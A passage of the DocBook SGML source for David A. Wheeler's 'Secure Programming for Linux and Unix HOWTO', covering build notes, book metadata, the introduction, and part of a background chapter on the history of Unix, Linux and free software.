mirror of https://github.com/tLDP/LDP
17939 lines
706 KiB
Plaintext
17939 lines
706 KiB
Plaintext
<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook V4.1//EN">
|
||
|
||
<!-- "Secure Programming for Linux and Unix HOWTO",
|
||
Copyright (C) 1999-2003 David A. Wheeler
|
||
http://www.dwheeler.com/secure-programs -->
|
||
|
||
<!-- WARNING!!! This book is MUCH LARGER than the tiny little HOWTO's
|
||
that you may be used to, and I've found that you have to
|
||
reconfigure certain tools and use some tools carefully
|
||
for this book to be produced properly.
|
||
|
||
TeX's default save-size is TOO SMALL to print this large book.
|
||
You need to modify the Tex configuration file "texmf.cnf"; this is in
|
||
"/usr/share/texmf/web2c" on Red Hat Linux 7.1, and in "/etc" on some
|
||
other systems. Change the entry saying:
|
||
save_size.pdfjadetex = 5000
|
||
to a larger size, say:
|
||
save_size.pdfjadetex = 30000
|
||
|
||
Also, for printing you need to change the style slightly using the
|
||
"-d" option, such as:
|
||
db2ps -d dwheeler-book-style.dsl Secure-Programs-HOWTO.sgml
|
||
Otherwise, the URLs run right off the right-hand side of the page
|
||
in the printed versions and it's really awful.
|
||
|
||
When generating the PDF, generate the Postscript and then
|
||
translate that to PDF. That has its disadvantages, but the
|
||
"db2pdf" can't handle figures properly (the TeX intermediate stage
|
||
can't handle .eps, and DocBook won't let you insert .pdf).
|
||
Ideally mediaobject would be more flexible than this..!
|
||
|
||
This is a book, so it should follow book conventions. This means
|
||
the first pages should be numbered with roman numerals
|
||
(the first page of chapter 1 becomes page 1), and that chapters always
|
||
begin on the right-hand side (odd numbered pages). Currently, the
|
||
Docbook tools don't do this - UGH! However, there are patches to do it -
|
||
http://www.mail-archive.com/docbook-apps@lists.oasis-open.org/msg02364.html
|
||
(Re: DOCBOOK-APPS: preface page numbering)
|
||
From: camille
|
||
Subject: Re: DOCBOOK-APPS: preface page numbering
|
||
Date: Fri, 24 Aug 2001 00:41:15 -0700
|
||
Mentions this - apply twosidestartonright.patch.bz2 and features.patch.bz2
|
||
(had to change the %top-margin% when using the patched openjade).
|
||
The "features" patch (Francis J. Lacoste's) must be applied first.
|
||
-->
|
||
|
||
|
||
<!-- This is a sample comment.
|
||
This book has had more titles than I'd like to think about. It was
|
||
originally titled "How to Write Secure Programs for Linux", then
|
||
"Design and Implementation Guidelines for Secure Linux Applications".
|
||
I first released it widely as the
|
||
"Secure Programming for Linux HOWTO", and then it morphed into the
|
||
"Secure Programming for Linux and Unix HOWTO".
|
||
|
||
You can get the latest version of this book from:
|
||
http://www.dwheeler.com/secure-programs/
|
||
|
||
Note that this is the DocBook DTD version!
|
||
To process it, get DocBook tools. If you are using Cygnus's tools, do this:
|
||
db2html Secure*.sgml
|
||
db2ps Secure*.sgml
|
||
|
||
Earlier versions through version 1.60 used the Linuxdoc DTD;
|
||
Version 2.00 has the same content as 1.60, but in DocBook format.
|
||
While the book is now legal DocBook content, it's not "fully"
|
||
marked-up; suggestions on missing markings welcome.
|
||
|
||
|
||
-->
|
||
|
||
<!--
|
||
??? Need to add material from Oliver Friedrichs <of@securityfocus.com>
|
||
http://www.securityfocus.com/forums/secprog/secure-programming.html
|
||
backup copy at:
|
||
http://www.cli.di.unipi.it/~zoppi/docs/secprog.html
|
||
now cached at:
|
||
http://www.google.com/search?q=cache:DpVgMo24NZQ:www.securityfocus.com/forum
|
||
s/secprog/secure-programming.html+%22Oliver+Friedrichs%22+%22secure+programm
|
||
ing%22&hl=en
|
||
especially code examples. This will add Windows-related material, so
|
||
I'll change the title to be more inclusive and add summary materials about
|
||
Windows' security approaches. This will involve a modification of many
|
||
areas, since most of the text assumes a Unix-like only viewpoint.
|
||
|
||
??? Should look at Razvan Peteanu <razvan.peteanu@home.com>'s material at
|
||
http://members.home.net/razvan.peteanu/Best%20Practices%20for%20Secure%20Web
|
||
%20Development%203.0.pdf
|
||
to see if I've missed anything.
|
||
|
||
??? Examine other material:
|
||
LSAP FAQ http://lsap.org/faq.txt
|
||
http://www.w3.org/Security/Faq/www-security-faq.html
|
||
http://security.devx.com/ See Best Defense Tab & more defense articles.
|
||
http://members.home.net/razvan.peteanu/
|
||
http://www.shmoo.com/securecode/
|
||
http://www.securityfocus.com/frames/?content=/forums/secprog/intro.html A listserve on the subject.
|
||
http://heap.nologin.net/aspsec.html
|
||
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html
|
||
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog1.html
|
||
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog2.html
|
||
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog3.html
|
||
and so on till
|
||
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog8.html
|
||
Good developer oriented resources:
|
||
http://www-106.ibm.com/developerworks/security/
|
||
http://www.boran.com/security/it13-applications.html
|
||
|
||
Some code review sites:
|
||
http://www.homeport.org/~adam/review.html
|
||
http://www.mozilla.org/hacking/reviewers.html
|
||
http://www.dnaco.net/~kragen/security-holes.html
|
||
|
||
I have other links at http://heap.nologin.net/programming.html which may be
|
||
of interest, but those seemed most relevant.
|
||
|
||
|
||
For general statistics on computer crime, see the FBI/CSI
|
||
"Computer Crime and Security Survey", e.g.,
|
||
http://www.gocsi.com/press/20020407.html
|
||
|
||
|
||
-->
|
||
|
||
|
||
<book>
|
||
|
||
<bookinfo>
|
||
|
||
<!-- bookbiblio -->
|
||
|
||
<title>Secure Programming for Linux and Unix HOWTO</title>
|
||
<author>
|
||
<firstname>David</firstname> <othername role="mi">A.</othername><surname>Wheeler</surname>
|
||
</author>
|
||
<address><email>dwheeler@dwheeler.com</email></address>
|
||
<pubdate>v3.010, 3 March 2003</pubdate>
|
||
<edition>v3.010</edition>
|
||
<!-- FYI: The LDP claims they don't use the "edition" tag. -->
|
||
<copyright>
|
||
<year>1999</year>
|
||
<year>2000</year>
|
||
<year>2001</year>
|
||
<year>2002</year>
|
||
<year>2003</year>
|
||
<holder>David A. Wheeler</holder>
|
||
</copyright>
|
||
|
||
<legalnotice>
|
||
<para>
|
||
This book is Copyright (C) 1999-2003 David A. Wheeler.
|
||
Permission is granted to copy, distribute and/or modify
|
||
this book under the terms of the GNU Free Documentation License (GFDL),
|
||
Version 1.1 or any later version published by the Free Software Foundation;
|
||
with the invariant sections being ``About the Author'',
|
||
with no Front-Cover Texts, and no Back-Cover texts.
|
||
A copy of the license is included in the section entitled
|
||
"GNU Free Documentation License".
|
||
This book is distributed in the hope that it will be useful,
|
||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||
</para>
|
||
</legalnotice>
|
||
|
||
<abstract>
|
||
<para>
|
||
This book provides a set of design and implementation
|
||
guidelines for writing secure programs for Linux and Unix systems.
|
||
Such programs include application programs used as viewers of remote data,
|
||
web applications (including CGI scripts),
|
||
network servers, and setuid/setgid programs.
|
||
Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl,
|
||
and Ada95 are included.
|
||
For a current version of the book, see
|
||
<ulink url="http://www.dwheeler.com/secure-programs">
|
||
http://www.dwheeler.com/secure-programs</ulink>
|
||
</para>
|
||
</abstract>
|
||
|
||
<!-- /bookbiblio -->
|
||
<keywordset>
|
||
<keyword>secure programming</keyword>
|
||
<keyword>secure programs</keyword>
|
||
<keyword>secure applications</keyword>
|
||
<keyword>secure</keyword>
|
||
<keyword>programming</keyword>
|
||
<keyword>security</keyword>
|
||
<keyword>Linux</keyword>
|
||
<keyword>Unix</keyword>
|
||
<keyword>hack</keyword>
|
||
<keyword>crack</keyword>
|
||
<keyword>vulnerability</keyword>
|
||
<keyword>buffer overflow</keyword>
|
||
<keyword>design</keyword>
|
||
<keyword>implementation</keyword>
|
||
<keyword>web application</keyword>
|
||
<keyword>web applications</keyword>
|
||
<keyword>CGI</keyword>
|
||
<keyword>setuid</keyword>
|
||
<keyword>setgid</keyword>
|
||
<keyword>C</keyword>
|
||
<keyword>C++</keyword>
|
||
<keyword>Java</keyword>
|
||
<keyword>Perl</keyword>
|
||
<keyword>PHP</keyword>
|
||
<keyword>Python</keyword>
|
||
<keyword>Tcl</keyword>
|
||
<keyword>Ada</keyword>
|
||
<keyword>Ada95</keyword>
|
||
</keywordset>
|
||
|
||
</bookinfo>
|
||
|
||
<!-- Begin the book -->
|
||
|
||
|
||
<chapter id="introduction">
|
||
<title>Introduction</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 21:22 (NIV)</attribution>
|
||
<para>
|
||
A wise man attacks the city of the mighty
|
||
and pulls down the stronghold in which they trust.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
This book describes a set of guidelines for
|
||
writing secure programs on Linux and Unix systems.
|
||
For purposes of this book, a ``secure program'' is a program
|
||
that sits on a security boundary, taking input from a source that does
|
||
not have the same access rights as the program.
|
||
Such programs include application programs used as viewers of remote data,
|
||
web applications (including CGI scripts),
|
||
network servers, and setuid/setgid programs.
|
||
This book does not address modifying the operating system kernel itself,
|
||
although many of the principles discussed here do apply.
|
||
These guidelines were developed as a survey of
|
||
``lessons learned'' from various sources on how to create such programs
|
||
(along with additional observations by the author),
|
||
reorganized into a set of larger principles.
|
||
This book includes specific guidance for a number of languages,
|
||
including C, C++, Java, Perl, PHP, Python, Tcl, and Ada95.
|
||
</para>
|
||
|
||
<para>
|
||
You can find the master copy of this book at
|
||
<ulink url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>.
|
||
This book is also part of the Linux Documentation Project (LDP) at
|
||
<ulink
|
||
url="http://www.tldp.org">http://www.tldp.org</ulink>
|
||
It's also mirrored in several other places.
|
||
Please note that these mirrors, including the LDP copy and/or the
|
||
copy in your distribution, may be older than the master copy.
|
||
I'd like to hear comments on this book, but please do not send comments
|
||
until you've checked to make sure that your comment is valid for the
|
||
latest version.
|
||
</para>
|
||
|
||
<para>
|
||
This book does not cover assurance measures, software engineering
|
||
processes, and quality assurance approaches,
|
||
which are important but widely discussed elsewhere.
|
||
Such measures include testing, peer review,
|
||
configuration management, and formal methods.
|
||
Documents specifically identifying sets of development
|
||
assurance measures for security issues include
|
||
the Common Criteria (CC, [CC 1999]) and the
|
||
Systems Security Engineering Capability Maturity Model [SSE-CMM 1999].
|
||
Inspections and other peer review techniques are discussed in
|
||
[Wheeler 1996].
|
||
This book does briefly discuss ideas from the CC, but only as an organizational
|
||
aid to discuss security requirements.
|
||
More general sets of software engineering processes
|
||
are defined in documents such as the
|
||
Software Engineering Institute's Capability Maturity Model for Software
|
||
(SW-CMM) [Paulk 1993a, 1993b]
|
||
and ISO 12207 [ISO 12207].
|
||
General international standards for quality systems are defined in
|
||
ISO 9000 and ISO 9001 [ISO 9000, 9001].
|
||
|
||
|
||
<!--
|
||
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
|
||
Note that ISO 9001-3 is obsolete.
|
||
-->
|
||
<!-- ??? Ideally have references for these. -->
|
||
</para>
|
||
|
||
<para>
|
||
This book does not discuss how to configure a system (or network)
|
||
to be secure in a given environment. This is clearly necessary for
|
||
secure use of a given program,
|
||
but a great many other documents discuss secure configurations.
|
||
An excellent general book on configuring Unix-like systems to be
|
||
secure is Garfinkel [1996].
|
||
Other books for securing Unix-like systems include Anonymous [1998].
|
||
You can also find information on configuring Unix-like systems at web sites
|
||
such as
|
||
<ulink url="http://www.unixtools.com/security.html">http://www.unixtools.com/security.html</ulink>.
|
||
Information on configuring a Linux system to be secure is available in a
|
||
wide variety of documents including
|
||
Fenzi [1999], Seifried [1999], Wreski [1998], Swan [2001],
|
||
and Anonymous [1999].
|
||
Geodsoft [2001] describes how to harden OpenBSD,
|
||
and many of its suggestions are useful for any Unix-like system.
|
||
Information on auditing existing Unix-like systems are discussed in
|
||
Mookhey [2002].
|
||
For Linux systems (and eventually other Unix-like systems),
|
||
you may want to examine the Bastille Hardening System, which
|
||
attempts to ``harden'' or ``tighten'' the Linux operating system.
|
||
You can learn more about Bastille at
|
||
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>;
|
||
it is available for free under the General Public License (GPL).
|
||
Other hardening systems include
|
||
<ulink url="http://www.grsecurity.net">grsecurity</ulink>.
|
||
For Windows 2000, you might want to look at
|
||
Cox [2000].
|
||
The U.S. National Security Agency (NSA) maintains a set of
|
||
security recommendation guides at
|
||
<ulink url="http://nsa1.www.conxion.com">http://nsa1.www.conxion.com</ulink>,
|
||
including the ``60 Minute Network Security Guide.''
|
||
If you're trying to establish a public key infrastructure (PKI) using
|
||
open source tools, you might want to look at the
|
||
<ulink url="http://ospkibook.sourceforge.net">
|
||
Open Source PKI Book.
|
||
</ulink>
|
||
More about firewalls and Internet security is found in
|
||
[Cheswick 1994].
|
||
</para>
|
||
|
||
<para>
|
||
Configuring a computer is only part of Security Management, a larger
|
||
area that also covers how to deal with viruses, what kind of
|
||
organizational security policy is needed, business continuity plans, and
|
||
so on.
|
||
There are international standards and guidance for security management.
|
||
ISO 13335 is a five-part
|
||
technical report giving guidance on security management [ISO 13335].
|
||
ISO/IEC 17799:2000 defines a code of practice [ISO 17799];
|
||
its stated purpose is to give high-level and general
|
||
``recommendations for information security management
|
||
for use by those who are responsible for initiating, implementing or
|
||
maintaining security in their organization.''
|
||
The document specifically identifies itself as
|
||
"a starting point for developing organization specific guidance."
|
||
It also states that not all of the guidance and controls it contains may be
|
||
applicable, and that additional controls not contained may be required.
|
||
Even more importantly, they are intended to be
|
||
broad guidelines covering a number of areas.
|
||
and not intended to give definitive details or "how-tos".
|
||
It's worth noting that the original
|
||
signing of ISO/IEC 17799:2000 was controversial;
|
||
Belgium, Canada, France, Germany, Italy, Japan and the US
|
||
voted <emphasis>against</emphasis> its adoption.
|
||
However, it appears that these votes were primarily a protest on
|
||
parliamentary procedure, not on the content of the document,
|
||
and certainly people are welcome to use ISO 17799 if they find it helpful.
|
||
More information about ISO 17799 can be found in NIST's
|
||
<ulink url="http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf">
|
||
ISO/IEC 17799:2000 FAQ</ulink>.
|
||
ISO 17799 is highly related to BS 7799 part 1 and 2;
|
||
more information about BS 7799 can be found at
|
||
<ulink url="http://www.xisec.com/faq.htm">http://www.xisec.com/faq.htm</ulink>.
|
||
ISO 17799 is currently under revision.
|
||
It's important to note that none of these standards
|
||
(ISO 13335, ISO 17799, or BS 7799 parts 1 and 2)
|
||
are intended to be a detailed set of technical guidelines for software
|
||
developers;
|
||
they are all intended to provide broad guidelines in a number of areas.
|
||
This is important, because software developers who
|
||
simply only follow (for example) ISO 17799 will
|
||
generally <emphasis>not</emphasis> produce
|
||
secure software - developers need much, much, much
|
||
more detail than ISO 17799 provides.
|
||
</para>
|
||
|
||
<para>
|
||
The Commonly Accepted Security Practices & Recommendations (CASPR)
|
||
project at
|
||
<ulink url="http://www.caspr.org">http://www.caspr.org</ulink>
|
||
is trying to distill information security knowledge into a series of
|
||
papers available to all (under the GNU FDL license, so that future
|
||
document derivatives will continue to be available to all).
|
||
Clearly, security management needs to include keeping with patches
|
||
as vulnerabilities are found and fixed.
|
||
Beattie [2002] provides an
|
||
interesting analysis on how to determine when to apply patches
|
||
contrasting risk of a bad patch to the risk of intrusion
|
||
(e.g., under certain conditions, patches are optimally
|
||
applied 10 or 30 days after they are released).
|
||
</para>
|
||
|
||
<para>
|
||
If you're interested in the current state of vulnerabilities, there are
|
||
other resources available to use.
|
||
The CVE at http://cve.mitre.org gives a standard identifier for each
|
||
(widespread) vulnerability.
|
||
The paper
|
||
<ulink url="http://securitytracker.com/learn/securitytracker-stats-2002.pdf">
|
||
SecurityTracker Statistics</ulink>
|
||
analyzes vulnerabilities to determine what were the
|
||
most common vulnerabilities.
|
||
The Internet Storm Center at http://isc.incidents.org/
|
||
shows the prominence of various Internet attacks around the world.
|
||
</para>
|
||
|
||
<para>
|
||
This book assumes that the reader understands computer
|
||
security issues in general, the general security model of Unix-like systems,
|
||
networking (in particular TCP/IP based networks),
|
||
and the C programming language.
|
||
This book does include some information about the Linux and Unix
|
||
programming model for security.
|
||
If you need more information on how TCP/IP based networks and protocols
|
||
work, including their security protocols, consult general works on
|
||
TCP/IP such as [Murhammer 1998].
|
||
</para>
|
||
|
||
<para>
|
||
When I first began writing this document, there were many short articles
|
||
but no books on writing secure programs.
|
||
There are now two other books on writing secure programs.
|
||
One is ``Building Secure Software'' by John Viega and Gary McGraw [Viega 2002];
|
||
this is a very good book that discusses a number of important security issues,
|
||
but it omits a large number of important security problems that are
|
||
instead covered here.
|
||
Basically, this book selects several important topics and covers them
|
||
well, but at the cost of omitting many other important topics.
|
||
The Viega book has a little more information for Unix-like systems than for
|
||
Windows systems, but much of it is independent of the kind of system.
|
||
The other book is ``Writing Secure Code'' by Michael Howard and David LeBlanc
|
||
[Howard 2002].
|
||
The title of this other book is misleading;
|
||
the book is solely about writing secure programs for Windows,
|
||
and is basically worthless if you are writing programs for any other system.
|
||
This shouldn't be surprising; it's published by Microsoft press, and its
|
||
copyright is owned by Microsoft.
|
||
If you are trying to write secure programs for Microsoft's
|
||
Windows systems, it's a good book.
|
||
Another useful source of secure programming guidance is the
|
||
<ulink url="http://www.owasp.org/guide">
|
||
The Open Web Application Security Project (OWASP)
|
||
Guide to Building Secure Web Applications and Web Services</ulink>;
|
||
it has more on process, and less specifics than this book, but it
|
||
has useful material in it.
|
||
</para>
|
||
|
||
<para>
|
||
This book covers all Unix-like systems, including Linux and the
|
||
various strains of Unix, and it particularly stresses Linux and provides
|
||
details about Linux specifically.
|
||
There's some material specifically on Windows CE, and in fact much of
|
||
this material is not limited to a particular operating system.
|
||
If you know relevant information not already included here, please let
|
||
me know.
|
||
</para>
|
||
|
||
<para>
|
||
This book is copyright (C) 1999-2002 David A. Wheeler and is covered by the
|
||
GNU Free Documentation License (GFDL);
|
||
see <xref linkend="about-license"> and
|
||
<xref linkend="fdl"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
<xref linkend="background">
|
||
discusses the background of Unix, Linux, and security.
|
||
<xref linkend="features">
|
||
describes the general Unix and Linux security model,
|
||
giving an overview of the security attributes and operations of
|
||
processes, filesystem objects, and so on.
|
||
This is followed by the meat of this book, a set of design and implementation
|
||
guidelines for developing applications on Linux and Unix systems.
|
||
The book ends with conclusions in
|
||
<xref linkend="conclusion">,
|
||
followed by a lengthy bibliography and appendixes.
|
||
</para>
|
||
|
||
<!-- ???: Reference other taxonomies, such as Bisbey's at
|
||
http://seclab.cs.ucdavis.edu/projects/history/papers/bisb78.pdf
|
||
and see if I should (partially) switch to one of them.
|
||
-->
|
||
<para>
|
||
The design and implementation guidelines are divided into
|
||
categories which I believe emphasize the programmer's viewpoint.
|
||
Programs accept inputs, process data, call out to other resources,
|
||
and produce output, as shown in <xref linkend="abstract-program">;
|
||
notionally all security guidelines fit into one of these categories.
|
||
I've subdivided ``process data'' into
|
||
structuring program internals and approach,
|
||
avoiding buffer overflows (which in some cases can also be considered
|
||
an input issue),
|
||
language-specific information, and special topics.
|
||
The chapters are ordered to make the material easier to follow.
|
||
Thus, the book chapters giving guidelines discuss
|
||
validating all input (<xref linkend="input">),
|
||
avoiding buffer overflows (<xref linkend="buffer-overflow">),
|
||
structuring program internals and approach (<xref linkend="internals">),
|
||
carefully calling out to other resources (<xref linkend="call-out">),
|
||
judiciously sending information back (<xref linkend="output">),
|
||
language-specific information (<xref linkend="language-specific">),
|
||
and finally information on special topics such as how to acquire random
|
||
numbers (<xref linkend="special">).
|
||
</para>
|
||
|
||
<figure float="1" id="abstract-program">
|
||
<title>Abstract View of a Program</title>
|
||
<mediaobject>
|
||
<imageobject>
|
||
<imagedata scalefit="1" scale="50" fileref="images/program.eps" format="eps">
|
||
</imageobject>
|
||
<imageobject>
|
||
<imagedata fileref="images/program.png" format="png">
|
||
</imageobject>
|
||
<textobject>
|
||
<phrase>
|
||
A program accepts inputs, processes data,
|
||
possibly calls out to other programs, and produces output.
|
||
</phrase>
|
||
</textobject>
|
||
</mediaobject>
|
||
</figure>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="background">
|
||
<title>Background</title>
|
||
|
||
<epigraph>
|
||
<attribution>Ezra 4:19 (NIV)</attribution>
|
||
<para>
|
||
I issued an order and a search was made, and it was found that this
|
||
city has a long history of revolt against kings and has been
|
||
a place of rebellion and sedition.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="history">
|
||
<title>History of Unix, Linux, and Open Source / Free Software</title>
|
||
|
||
<sect2 id="unix-history">
|
||
<title>Unix</title>
|
||
|
||
<para>
|
||
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at
|
||
AT&T Bell Labs began developing
|
||
a small operating system on a little-used PDP-7.
|
||
The operating system was soon christened Unix, a pun on an earlier operating
|
||
system project called MULTICS.
|
||
In 1972-1973 the system was rewritten in the programming language C,
|
||
an unusual step that was visionary: due to this decision, Unix was
|
||
the first widely-used operating system that
|
||
could switch from and outlive its original hardware.
|
||
Other innovations were added to Unix as well, in part due to synergies
|
||
between Bell Labs and the academic community.
|
||
In 1979, the ``seventh edition'' (V7) version
|
||
of Unix was released, the grandfather of all extant Unix systems.
|
||
</para>
|
||
|
||
<para>
|
||
After this point, the history of Unix becomes somewhat convoluted.
|
||
The academic community, led by Berkeley, developed a variant called the
|
||
Berkeley Software Distribution (BSD), while AT&T continued developing
|
||
Unix under the names ``System III'' and later ``System V''.
|
||
In the late 1980's through early 1990's
|
||
the ``wars'' between these two major strains raged.
|
||
After many years each variant adopted many of the key features of the other.
|
||
Commercially, System V won the ``standards wars'' (getting most of its
|
||
interfaces into the formal standards), and
|
||
most hardware vendors switched to AT&T's System V.
|
||
However, System V ended up incorporating many BSD innovations, so the
|
||
resulting system was more a merger of the two branches.
|
||
The BSD branch did not die, but instead became widely used
|
||
for research, for PC hardware, and for
|
||
single-purpose servers (e.g., many web sites use a BSD derivative).
|
||
</para>
|
||
|
||
<para>
|
||
The result was many different versions of Unix,
|
||
all based on the original seventh edition.
|
||
Most versions of Unix were proprietary and maintained by their respective
|
||
hardware vendor, for example, Sun Solaris is a variant of System V.
|
||
Three versions of the BSD branch of Unix ended up as open source:
|
||
FreeBSD (concentrating on ease-of-installation for PC-type hardware),
|
||
NetBSD (concentrating on many different CPU architectures), and
|
||
a variant of NetBSD, OpenBSD (concentrating on security).
|
||
More general information about Unix history can be found at
|
||
<ulink
|
||
url="http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm">http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm</ulink>,
|
||
<ulink
|
||
url="http://perso.wanadoo.fr/levenez/unix">http://perso.wanadoo.fr/levenez/unix</ulink>, and
|
||
<ulink url="http://www.crackmonkey.org/unix.html">
|
||
http://www.crackmonkey.org/unix.html
|
||
</ulink>.
|
||
Much more information about the BSD history can be found in
|
||
[McKusick 1999] and
|
||
<ulink
|
||
url="ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree">ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
A slightly old but interesting advocacy piece that presents arguments
|
||
for using Unix-like systems (instead of Microsoft's products) is
|
||
<ulink
|
||
url="http://web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch">
|
||
John Kirch's paper ``Microsoft Windows NT Server 4.0 versus UNIX''
|
||
</ulink>.
|
||
<!-- Note that researchers prefer Unix-like systems, not Windows; see
|
||
http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html -->
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="fsf-history">
|
||
<title>Free Software Foundation</title>
|
||
|
||
<para>
|
||
In 1984 Richard Stallman's Free Software Foundation (FSF) began the GNU
|
||
project, a project to create a free version of the Unix operating system.
|
||
By free, Stallman meant software that could be freely
|
||
used, read, modified, and redistributed.
|
||
The FSF successfully built a vast number of
|
||
useful components, including a C compiler (gcc), an
|
||
impressive text editor (emacs), and a host of fundamental tools.
|
||
However, in the 1990's the FSF
|
||
was having trouble developing the operating system kernel [FSF 1998];
|
||
without a kernel their dream of a completely free operating system
|
||
would not be realized.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="linux-history">
|
||
<title>Linux</title>
|
||
|
||
<para>
|
||
In 1991 Linus Torvalds began developing an operating system kernel, which
|
||
he named ``Linux'' [Torvalds 1999].
|
||
This kernel could be combined with the FSF material and other components
|
||
(in particular some of the BSD components and MIT's X-windows software) to
|
||
produce a freely-modifiable and very useful operating system.
|
||
This book will term the kernel itself the ``Linux kernel'' and
|
||
an entire combination as ``Linux''.
|
||
Note that many use the term ``GNU/Linux'' instead for this combination.
|
||
</para>
|
||
|
||
<para>
|
||
In the Linux community,
|
||
different organizations have combined the available components differently.
|
||
Each combination is called a ``distribution'', and the organizations that
|
||
develop distributions are called ``distributors''.
|
||
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel,
|
||
and Debian.
|
||
There are differences between the various distributions,
|
||
but all distributions are based on the same foundation: the
|
||
Linux kernel and the GNU glibc libraries.
|
||
Since both are covered by ``copyleft'' style licenses, changes to
|
||
these foundations generally must be made available to all, a
|
||
unifying force between the Linux distributions at their foundation
|
||
that does not exist between the BSD and AT&T-derived Unix systems.
|
||
This book is not specific to any Linux distribution; when it
|
||
discusses Linux it presumes Linux
|
||
kernel version 2.2 or greater and the C library glibc 2.1 or greater,
|
||
valid assumptions for essentially all current major
|
||
Linux distributions.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="oss-history">
|
||
<title>Open Source / Free Software</title>
|
||
|
||
<para>
|
||
Increased interest in software that is freely shared
|
||
has made it increasingly necessary to define and explain it.
|
||
A widely used term is ``open source software'', which is further defined in
|
||
[OSI 1999].
|
||
Eric Raymond [1997, 1998] wrote several seminal articles examining
|
||
its various development processes.
|
||
Another widely-used term is ``free software'', where the ``free''
|
||
is short for ``freedom'': the usual explanation is ``free speech, not
|
||
free beer.''
|
||
Neither phrase is perfect.
|
||
The term
|
||
``free software'' is often confused with programs whose executables are
|
||
given away at no charge, but whose source code cannot be viewed, modified,
|
||
or redistributed.
|
||
Conversely, the term ``open source'' is sometime (ab)used
|
||
to mean software whose
|
||
source code is visible, but for which there are limitations on
|
||
use, modification, or redistribution.
|
||
This book uses the term ``open source'' for its usual meaning, that
|
||
is, software which has its source code freely available for
|
||
use, viewing, modification, and redistribution; a more detailed
|
||
definition is contained in the
|
||
<ulink
|
||
url="http://www.opensource.org/osd.html">Open Source Definition</ulink>.
|
||
In some cases, a difference in motive is suggested;
|
||
those preferring the term ``free software'' wish to strongly
|
||
emphasize the need for freedom, while those using the term may have
|
||
other motives (e.g., higher reliability) or simply wish to appear less
|
||
strident.
|
||
For information on this definition of free software, and
|
||
the motivations behind it, can be found at
|
||
<ulink url="http://www.fsf.org">http://www.fsf.org</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Those interested in reading advocacy pieces for open source software
|
||
and free software should see
|
||
<ulink
|
||
url="http://www.opensource.org">http://www.opensource.org</ulink> and
|
||
<ulink
|
||
url="http://www.fsf.org">http://www.fsf.org</ulink>.
|
||
There are other documents which examine such software, for example,
|
||
Miller [1995]
|
||
found that the open source software were noticeably
|
||
more reliable than proprietary software
|
||
(using their measurement technique, which measured
|
||
resistance to crashing due to random input).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="linux-vs-unix">
|
||
<title>Comparing Linux and Unix</title>
|
||
|
||
<para>
|
||
This book uses the term ``Unix-like'' to describe
|
||
systems intentionally like Unix.
|
||
In particular, the term ``Unix-like'' includes
|
||
all major Unix variants and Linux distributions.
|
||
Note that many people simply use the term ``Unix'' to describe these systems
|
||
instead.
|
||
Originally, the term ``Unix'' meant a particular product developed
|
||
by AT&T.
|
||
Today, the Open Group owns the Unix trademark, and it defines Unix as
|
||
``the worldwide Single UNIX Specification''.
|
||
<!-- http://www.unix-systems.org/what_is_unix.html -->
|
||
</para>
|
||
|
||
<para>
|
||
Linux is not derived from Unix source code, but its interfaces are
|
||
intentionally like Unix.
|
||
Therefore, Unix lessons learned generally apply to both, including information
|
||
on security.
|
||
Most of the information in this book applies to any Unix-like system.
|
||
Linux-specific information has been intentionally added to
|
||
enable those using Linux to take advantage of Linux's capabilities.
|
||
</para>
|
||
|
||
<para>
|
||
Unix-like systems share a number of security mechanisms, though there
|
||
are subtle differences and not all systems have all mechanisms available.
|
||
All include user and group ids (uids and gids) for each process and
|
||
a filesystem with read, write, and execute permissions (for user, group, and
|
||
other).
|
||
<!-- ???: Most include System V single-machine
|
||
inter-process communication (IPC) mechanisms
|
||
and BSD's socket-based IPC (which support networks). -->
|
||
See Thompson [1974] and Bach [1986]
|
||
for general information on Unix systems, including their basic
|
||
security mechanisms.
|
||
<xref linkend="features">
|
||
summarizes key security features of Unix and Linux.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="security-principles">
|
||
<title>Security Principles</title>
|
||
|
||
<para>
|
||
There are many general security principles which you should be
|
||
familiar with; one good place for general information on information security
|
||
is the Information Assurance Technical Framework (IATF) [NSA 2000].
|
||
NIST has identified high-level ``generally accepted principles and practices''
|
||
[Swanson 1996].
|
||
You could also look at a general textbook on computer security, such as
|
||
[Pfleeger 1997].
|
||
NIST Special Publication 800-27 describes a number of good engineering
|
||
